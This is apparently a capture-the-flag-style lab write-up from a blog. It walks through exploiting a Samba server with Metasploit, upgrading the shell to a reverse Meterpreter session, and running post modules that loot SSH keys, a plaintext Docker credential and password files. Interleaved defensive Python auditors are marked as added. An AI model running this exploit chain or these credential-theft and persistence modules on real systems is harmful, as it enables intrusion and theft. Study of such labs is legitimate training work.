Post Exploitation Lab II

Posted by r3kind1e on March 24, 2023

Post Exploitation Lab II

Overview

In this lab, the target machine is running a vulnerable file sharing service. Exploit it and run the following post modules on the target:

  • post/multi/gather/ssh_creds
  • post/multi/gather/docker_creds
  • post/linux/gather/hashdump
  • post/linux/gather/ecryptfs_creds
  • post/linux/gather/enum_psk
  • post/linux/gather/enum_xchat
  • post/linux/gather/phpmyadmin_credsteal
  • post/linux/gather/pptpd_chap_secrets
  • post/linux/manage/sshkey_persistence

Instructions:

  • This lab is dedicated to you! No other users are on this network
  • Once you start the lab, you will have access to a root terminal of a Kali instance
  • Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
  • The target server should be located at the IP address 192.X.Y.3.
  • Do not attack the gateway located at IP address 192.X.Y.1
  • postgresql is not running by default so Metasploit may give you an error about this when starting

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-195.pdf

My own approach

post/multi/gather/ssh_creds

Multi Gather OpenSSH PKI Credentials Collection

This module will collect the contents of all users’ .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

post/multi/gather/docker_creds

Multi Gather Docker Credentials Collection

This module will collect the contents of all users’ .docker directories on the targeted machine. If the user has already pushed to Docker Hub, chances are that the password was saved in base64 (default behavior).
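Added example (not part of the original post or of Metasploit): a defender-side audit of a Docker client config.json that reports which registries keep an inline base64 auth value instead of using a credential helper, without ever returning the secret. The sample config, registry names and credential are constructed, and audit_docker_config is a hypothetical helper name.

```python
import base64
import json

# Constructed sample of a ~/.docker/config.json; the registry names and the
# credential are made up for this example.
SAMPLE_CONFIG = json.dumps({
    "auths": {
        "https://index.docker.io/v1/": {
            "auth": base64.b64encode(b"exampleuser:not-a-real-password").decode()
        },
        "registry.example.internal": {},
        "legacy.example.internal": {"auth": "%%%not-base64%%%"},
    },
    "credHelpers": {"registry.example.internal": "secretservice"},
})


def audit_docker_config(text):
    """Classify how each registry credential in a Docker client config is stored.

    Returns one dict per registry. The secret itself is never returned.
    """
    cfg = json.loads(text)
    global_store = cfg.get("credsStore")      # one helper for every registry
    helpers = cfg.get("credHelpers", {})      # per-registry helpers
    findings = []
    for registry, entry in sorted(cfg.get("auths", {}).items()):
        finding = {"registry": registry, "user": None, "exposed": False}
        auth = entry.get("auth")
        if auth:
            # An "auth" value is base64("user:password"): encoding, not encryption.
            finding["exposed"] = True
            finding["storage"] = "inline-unparsed"
            try:
                decoded = base64.b64decode(auth, validate=True).decode("utf-8")
                user, sep, _secret = decoded.partition(":")
                if sep:
                    finding["storage"] = "inline-base64"
                    finding["user"] = user
            except ValueError:
                pass  # not valid base64/UTF-8; still flagged as exposed
        elif registry in helpers:
            finding["storage"] = "helper:" + helpers[registry]
        elif global_store:
            finding["storage"] = "helper:" + global_store
        else:
            finding["storage"] = "none"
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_docker_config(SAMPLE_CONFIG):
        flag = "EXPOSED" if f["exposed"] else "ok"
        print(f"{flag:8} {f['registry']:32} {f['storage']:22} user={f['user']}")
```

Registries reported as inline-base64 are the ones to move to a credential helper and whose passwords should be rotated after a host compromise.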

post/linux/gather/hashdump

Linux Gather Dump Password Hashes for Linux Systems

Post module to dump the password hashes for all users on a Linux system.
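Added example (not from the original post or from Metasploit): a defender-side classifier for the password field of /etc/shadow, showing which accounts would actually yield a hash to a dump like this one and which use a weak scheme. The root and www-data lines are copied from the shadow loot shown later in this post; the other accounts and their hash strings are constructed, and the function names are hypothetical.

```python
# crypt(5) scheme identifiers mapped to names; anything else is "unknown-scheme".
SCHEMES = {
    "1": "md5-crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256-crypt",
    "6": "sha512-crypt",
    "y": "yescrypt",
}
# Entries a defender should treat as findings even before any cracking attempt.
WEAK = {"empty", "des-crypt", "md5-crypt"}

SAMPLE_SHADOW = """\
root:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
alice:$6$constructedsalt$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:19000:0:99999:7:::
bob:$1$constructed$BBBBBBBBBBBBBBBBBBBBBB:19000:0:99999:7:::
carol:!$6$constructedsalt$CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:19000:0:99999:7:::
dave::19000:0:99999:7:::
"""


def classify(field):
    """Classify the second field of a shadow entry."""
    if field == "":
        return "empty"                    # no password required at all
    if field[0] in "*!":
        return "locked"                   # password login disabled
    if field.startswith("$"):
        parts = field.split("$")
        if len(parts) > 2:
            return SCHEMES.get(parts[1], "unknown-scheme")
        return "unknown-scheme"
    # Traditional DES crypt has no "$" prefix and is always 13 characters.
    return "des-crypt" if len(field) == 13 else "unknown-scheme"


def audit_shadow(text):
    """Map each account name to the class of its password field."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        report[fields[0]] = classify(fields[1])
    return report


def accounts_with_hash(report):
    """Accounts whose shadow entry contains a usable password hash."""
    return sorted(u for u, kind in report.items() if kind not in ("locked", "empty"))


def weak_accounts(report):
    """Accounts with no password or a scheme considered weak."""
    return sorted(u for u, kind in report.items() if kind in WEAK)


if __name__ == "__main__":
    rep = audit_shadow(SAMPLE_SHADOW)
    for user, kind in rep.items():
        print(f"{user:10} {kind}")
    print("hash present:", accounts_with_hash(rep))
    print("weak:", weak_accounts(rep))
```

Run over the shadow file in this lab, every account comes back as locked, so the unshadowed file contains no password hashes.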

post/linux/gather/ecryptfs_creds

Gather eCryptfs Metadata

This module will collect the contents of all users’ .ecryptfs directories on the targeted machine. Collected “wrapped-passphrase” files can be cracked with John the Ripper (JtR) to recover “mount passphrases”.

post/linux/gather/enum_psk

Linux Gather NetworkManager 802-11-Wireless-Security Credentials

This module collects 802-11-Wireless-Security credentials such as Access-Point name and Pre-Shared-Key from Linux NetworkManager connection configuration files.
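Added example (not from the original post or from Metasploit): a defender-side audit of NetworkManager keyfiles that reports where each Wi-Fi PSK is stored (in the file, in a user agent, or not saved) and whether the file is accessible beyond its owner. The keyfile contents, SSIDs and passphrases are constructed, the helper names are hypothetical, and the default directory is the one shown in the module options later in this post.

```python
import configparser
import os
import stat

# Security section name in current keyfiles and in the older naming.
SECURITY_SECTIONS = ("wifi-security", "802-11-wireless-security")
# NetworkManager secret flags as used by psk-flags.
FLAG_AGENT_OWNED = 0x1   # secret held by a user agent (keyring), not in the file
FLAG_NOT_SAVED = 0x2     # secret is requested on every connection


def _sample(ssid, section=None, **keys):
    """Build a constructed keyfile; keyword names use '_' in place of '-'."""
    text = f"[connection]\nid={ssid}\ntype=wifi\n\n[wifi]\nssid={ssid}\n"
    if section:
        body = "".join(f"{k.replace('_', '-')}={v}\n" for k, v in keys.items())
        text += f"\n[{section}]\nkey-mgmt=wpa-psk\n{body}"
    return text


# (file name, file mode, content): all constructed for this example.
SAMPLES = [
    ("Office-WiFi", 0o600, _sample("Office-WiFi", "wifi-security",
                                   psk="constructed-passphrase-1")),
    ("Guest", 0o644, _sample("Guest", "802-11-wireless-security",
                             psk="constructed-passphrase-2")),
    ("Keyring-Backed", 0o600, _sample("Keyring-Backed", "wifi-security",
                                      psk_flags=1)),
    ("Open-Hotspot", 0o600, _sample("Open-Hotspot")),
]


def audit_keyfile(name, mode, text):
    """Report PSK storage and permission issues for one keyfile."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    storage = "none"
    for section in SECURITY_SECTIONS:
        if not parser.has_section(section):
            continue
        sec = parser[section]
        flags = int(sec.get("psk-flags", fallback="0"))
        if sec.get("psk"):
            storage = "file"              # plaintext PSK readable by root
        elif flags & FLAG_NOT_SAVED:
            storage = "not-saved"
        elif flags & FLAG_AGENT_OWNED:
            storage = "agent"
    issues = []
    if storage == "file":
        issues.append("plaintext-psk")
    if stat.S_IMODE(mode) & 0o077:
        issues.append("group-or-world-accessible")
    return {"name": name, "psk_storage": storage, "issues": issues}


def audit_directory(path="/etc/NetworkManager/system-connections/"):
    """Audit every keyfile in a directory (needs read access, normally root)."""
    results = []
    for entry in sorted(os.scandir(path), key=lambda e: e.name):
        if not entry.is_file():
            continue
        try:
            with open(entry.path, encoding="utf-8", errors="replace") as fh:
                results.append(audit_keyfile(entry.name, entry.stat().st_mode, fh.read()))
        except (OSError, configparser.Error) as exc:
            results.append({"name": entry.name, "psk_storage": "unknown",
                            "issues": [f"unreadable: {exc.__class__.__name__}"]})
    return results


if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_keyfile(*sample))
```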

post/linux/gather/enum_xchat

Linux Gather XChat Enumeration

This module will collect XChat’s config files and chat logs from the victim’s machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.

post/linux/gather/phpmyadmin_credsteal

Phpmyadmin credentials stealer

This module gathers phpMyAdmin credentials from the target Linux machine.

post/linux/gather/pptpd_chap_secrets

Linux Gather PPTP VPN chap-secrets Credentials

This module collects PPTP VPN information such as client, server, password, and IP from your target server’s chap-secrets file.

post/linux/manage/sshkey_persistence

SSH Key Persistence

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.
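Added example (not from the original post or from Metasploit): one way to detect this kind of persistence is to fingerprint every key in a user's authorized_keys file and flag any that is missing from a reviewed baseline. The key blobs below are constructed (structurally valid SSH wire format, cryptographically meaningless), and the helper names and baseline are assumptions.

```python
import base64
import hashlib
import struct


def _blob(key_type, payload):
    """Build a base64 SSH public key blob: length-prefixed type name + payload."""
    name = key_type.encode()
    return base64.b64encode(struct.pack(">I", len(name)) + name + payload).decode()


# Constructed blobs for this example, not real keys.
KEY_ADMIN = _blob("ssh-ed25519", struct.pack(">I", 32) + bytes(range(32)))
KEY_UNKNOWN = _blob("ssh-rsa", struct.pack(">I", 3) + b"\x01\x00\x01"
                    + struct.pack(">I", 8) + bytes(range(8, 16)))

SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed authorized_keys content
ssh-ed25519 {KEY_ADMIN} admin@workstation
no-pty,command="/usr/bin/true with spaces" ssh-rsa {KEY_UNKNOWN} unexpected@host

not a key line at all
"""


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a decoded public key blob."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (key_type, fingerprint, comment) for every well-formed key line.

    Options may precede the key type and may contain spaces, so each token pair
    is tested: the second token must be base64 whose embedded, length-prefixed
    type name equals the first token.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i in range(len(tokens) - 1):
            key_type, b64 = tokens[i], tokens[i + 1]
            try:
                blob = base64.b64decode(b64, validate=True)
            except ValueError:
                continue
            if len(blob) < 4:
                continue
            (name_len,) = struct.unpack(">I", blob[:4])
            if blob[4:4 + name_len] != key_type.encode():
                continue
            yield key_type, fingerprint(blob), " ".join(tokens[i + 2:])
            break


def unexpected_keys(text, baseline_fingerprints):
    """Return the entries whose fingerprint is not in the reviewed baseline."""
    return [entry for entry in parse_authorized_keys(text)
            if entry[1] not in baseline_fingerprints]


# Assumed baseline: only the admin key has been reviewed and approved.
BASELINE = {fingerprint(base64.b64decode(KEY_ADMIN))}

if __name__ == "__main__":
    for key_type, fp, comment in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE):
        print(f"unexpected key: {key_type} {fp} ({comment})")
```

The fingerprints have the same form as those printed by ssh-keygen -lf, so a baseline can be built from known-good files and checked on a schedule or on file-change events.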

My own approach

root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.198.6.2  netmask 255.255.255.0  broadcast 192.198.6.255
        ether 02:42:c0:c6:06:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.198.6.3

root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > db_nmap -sV 192.198.6.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-24 13:59 UTC
[*] Nmap: Nmap scan report for target-1 (192.198.6.3)
[*] Nmap: Host is up (0.0000090s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT    STATE SERVICE     VERSION
[*] Nmap: 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:C6:06:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.58 seconds
msf5 > services
Services
========

host         port  proto  name         state  info
----         ----  -----  ----         -----  ----
192.198.6.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 > setg RHOSTS 192.198.6.3
RHOSTS => 192.198.6.3
msf5 > search type:exploit samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   3   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.198.6.3      yes       The target address range or CIDR identifier
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.198.6.3:445 - Using location \\192.198.6.3\exploitable\tmp for the path
[*] 192.198.6.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.198.6.3:445 - Share 'exploitable' has server-side path '/
[*] 192.198.6.3:445 - Uploaded payload to \\192.198.6.3\exploitable\tmp\KiPyxObR.so
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using \\PIPE\/tmp/KiPyxObR.so...
[-] 192.198.6.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using /tmp/KiPyxObR.so...
[+] 192.198.6.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.198.6.2:34279 -> 192.198.6.3:445) at 2023-03-24 14:04:27 +0000

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)

msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.198.6.2:4433 
[*] Sending stage (985320 bytes) to 192.198.6.3
[*] Meterpreter session 2 opened (192.198.6.2:4433 -> 192.198.6.3:55958) at 2023-03-24 14:07:20 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                 Connection
  --  ----  ----                   -----------                                 ----------
  1         shell cmd/unix                                                     192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3  192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)
msf5 exploit(linux/samba/is_known_pipename) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 192.198.6.3
OS           : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
Background session 2? [y/N]
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/gather/ssh_creds
msf5 post(multi/gather/ssh_creds) > info

       Name: Multi Gather OpenSSH PKI Credentials Collection
     Module: post/multi/gather/ssh_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Jim Halfpenny

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .ssh directories 
  on the targeted machine. Additionally, known_hosts and 
  authorized_keys and any other files are also downloaded. This module 
  is largely based on firefox_creds.rb.

msf5 post(multi/gather/ssh_creds) > set SESSION 2
SESSION => 2
msf5 post(multi/gather/ssh_creds) > exploit

[*] Finding .ssh directories
[*] Looting 1 directories
[+] Downloaded /root/.ssh/id_rsa.pub -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/id_rsa -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[*] Post module execution completed
msf5 post(multi/gather/ssh_creds) > loot

Loot
====

host         service  type                 name                 content     info                          path
----         -------  ----                 ----                 -------     ----                          ----
192.198.6.3           ssh.id_rsa.pub       ssh_id_rsa.pub       text/plain  OpenSSH id_rsa.pub File       /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
192.198.6.3           ssh.id_rsa           ssh_id_rsa           text/plain  OpenSSH id_rsa File           /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
192.198.6.3           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
192.198.6.3           ssh.known_hosts      ssh_known_hosts      text/plain  OpenSSH known_hosts File      /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
msf5 post(multi/gather/ssh_creds) > cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[*] exec: cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDCAHi8jxxM2JsOnXhYvcGE+BSk0A/LiYXga5tY0VY1agbBn0eliru1UR8A58JPMAvgRERsI+MumQGruDNzx8iGvaM9EjajR+igMb1UdrJlRDfgvZvDKGje
g57Mifjn3Q+37BTuoaCU13DzCso2CMPKYxrFV3QZw1483G+FTBmKQ6XsFET/0TXwM+gBuZr8Xjgpejumqj9Ai7s4Sc19oGBr0PG7S0Xan0dAIp7X7U3sM2xLnW7jzZUL04TIPWwFkbFNll4xJj7dnLWqB4wf
V7A65R3kg+KRFvGgJbSfxU1uhDJ58BHIfN/CvJNULrqs51vK7DPq4NHPqjx64/XWgdcasct9uNh9saXFIvBC3zr4Ct2L5mQ/F88tTDvpMdOHn7xT/aesrJqOysNs60GK4tcAaRfJdemjyZsXcIL0kITqSu7K
n+eKq0mDAvvtYi9NPBi8dbr80zvKP9VsRMfMylQQz50GXdl9/hqIC/cvfeZbFCbXB2XQY4ln6ftIFFHN2WislqTWeW0jgEDSmXbVI0YGZrks+Q8W7mEi+T/HrcHL6zMpkO5Crte2HLYi5VdHiACKO/aS4wcX
VX4pjg+nc1Qh3japD2GyWdkb+8ILWvdA9wZr5Qk+8UL0NVU2KqdirxXcUIEOil+1K4XD/GoD4BN5J0uhkl3/hUYYf/tWdlFzWw== 172.168.5.153
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AD6F56B6F97C8F170282694A190D3E70
-----END RSA PRIVATE KEY-----
msf5 post(multi/gather/ssh_creds) > cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[*] exec: cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkk25JgzX1AhKJ44v7u0mEdcnQdQJVMD/OuazI79ZYYjLW6idWVvQoLTm0//0+VIeEJl2hZqdUf1xcrKsJVxITu3gkV9Vt08tcRj0JNOvgoRqls0SkpN49
V/FobPyL93oulrtgAznuQQ0j1IzPec2J6JnSMWydzO5WEyjtMOSes7OO5H4CLhdKyA587MOjMNBWwRhDkOiwdZ8X6AGoysRxQopA96MsKH8RaJhYeRE1dx9woD6nm2s2fkt9Z3mh1OY/QWd12ri6bfCfDcCs
q9HGZb/c2nVGAWVDSMB3ge/N3egqkBmWHnrl1KoBc/Mc+pMrQHGKT6EP1pHa8PVMnRz1
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt

|1|iM67F1aXb4HjGmoSUbo530yirQI=|OjIgmx0rWohz1taiWu9OzMlhzVo= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC3+Idhph1RjOwoUpMym1T3
Z8vXASo/dq1AvHs8OW1Y/YD+z9DgxSwRbBnjR0+i7X2fX/3A0Cul/lDY7qKmfwn8=
|1|P5xNWYsrjEgRNLFeDnL7W5MCaec=|RhjSVMJfPOOR1X0TQGIVmpgvcqU= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIKbtIYRARYYax0YAinw8ov
8b3ta+yaocJtjFqKtFQ9QJB8mF0CE16WQkMWBDnrsccTbPgZYXI23wEP61AvHIJM=
msf5 post(multi/gather/ssh_creds) > use post/multi/gather/docker_creds
msf5 post(multi/gather/docker_creds) > info

       Name: Multi Gather Docker Credentials Collection
     Module: post/multi/gather/docker_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Flibustier

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .docker 
  directories on the targeted machine. If the user has already push to 
  docker hub, chances are that the password was saved in base64 
  (default behavior).

msf5 post(multi/gather/docker_creds) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                 Connection
  --  ----  ----                   -----------                                 ----------
  1         shell cmd/unix                                                     192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3  192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)

msf5 post(multi/gather/docker_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/docker_creds) > exploit

[*] Finding .docker directories
[*] Looting 1 directories
[*] Downloading /root/.docker/config.json -> config.json
[+] Found attackdefence:Str0ngPassword@123
[+] Saved credentials
[*] Post module execution completed
msf5 post(multi/gather/docker_creds) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > info

       Name: Linux Gather Dump Password Hashes for Linux Systems
     Module: post/linux/gather/hashdump
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  Post Module to dump the password hashes for all users on a Linux 
  System

msf5 post(linux/gather/hashdump) > set SESSION 2
SESSION => 2

msf5 post(linux/gather/hashdump) > exploit

[+] Unshadowed Password File: /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.hashes_326677.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > loot

Loot
====

host         service  type                 name                   content     info                            path
----         -------  ----                 ----                   -------     ----                            ----
192.198.6.3           linux.shadow         shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt
192.198.6.3           linux.passwd         passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt
192.198.6.3           linux.hashes         unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.hashes_326677.txt
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt

root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
msf5 post(linux/gather/hashdump) > use post/linux/gather/ecryptfs_creds
msf5 post(linux/gather/ecryptfs_creds) > info

       Name: Gather eCryptfs Metadata
     Module: post/linux/gather/ecryptfs_creds
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Dhiru Kholia <dhiru@openwall.com>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .ecrypts 
  directories on the targeted machine. Collected "wrapped-passphrase" 
  files can be cracked with John the Ripper (JtR) to recover "mount 
  passphrases".

msf5 post(linux/gather/ecryptfs_creds) > set SESSION 1
SESSION => 1
msf5 post(linux/gather/ecryptfs_creds) > exploit

[!] SESSION may not be compatible with this module.
[*] Finding .ecryptfs directories
[*] Looting 1 directories
[*] Downloading /root/.ecryptfs/sig-cache.txt -> sig-cache.txt
